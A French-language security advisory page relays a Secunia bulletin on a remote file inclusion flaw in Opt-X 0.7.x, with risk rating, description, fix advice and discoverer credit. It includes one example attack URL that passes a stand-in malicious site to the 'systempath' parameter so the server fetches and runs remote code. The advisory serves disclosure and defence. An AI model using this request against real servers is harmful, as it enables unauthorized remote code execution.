Sécurité informatique

SECURINFOS.INFO - Bulletins de sécurité informatique, Alertes et Protection

Opt-X : Vulnérabilité d'Inclusion de Fichier Arbitraire

21/01/2007 21H36
Référence Secunia : SA10967 
Date de publication : 2004-02-24

Risque : Elevé. Niveau 4 sur 5.
Impact : Accès au système
Lieu : A distance


Solutions :
Non corrigée


Produit :
Opt-X 0.7.x

Description :
G00db0y a rapporté une vulnérabilité dans Opt-X, qui pourrait être exploitée par des personnes malintentionnées afin de compromettre un système vulnérable.

L'entrée utilisateur passée à the "systempath" dans "/includes/header.php" n'est pas vérifiée correctement avant d'être utilisée pour inclure des fichiers. Cela pourrait être exploité pour inclure des scripts depuis des ressources externes en passant une URL à un site distant.

Example incluant "menu.php" depuis un site distant:
http://[victime]/includes/header.php?systempath=http://[site_malicieux]/

La version 0.7.2 est rapportée affectée.


Solutions :
Editez le code source pour s'assurer que l'entrée passée au paramètre "systempath" est proprement filtrée.


Vulnérabilité découverte par :

G00db0y, Zone-h Security Labs.

Référence :
http://www.zone-h.org/en/advisories/read/id=4036/






Les noms, marques et enseignes cités sur ce site sont la propriété de leurs déposants respectifs.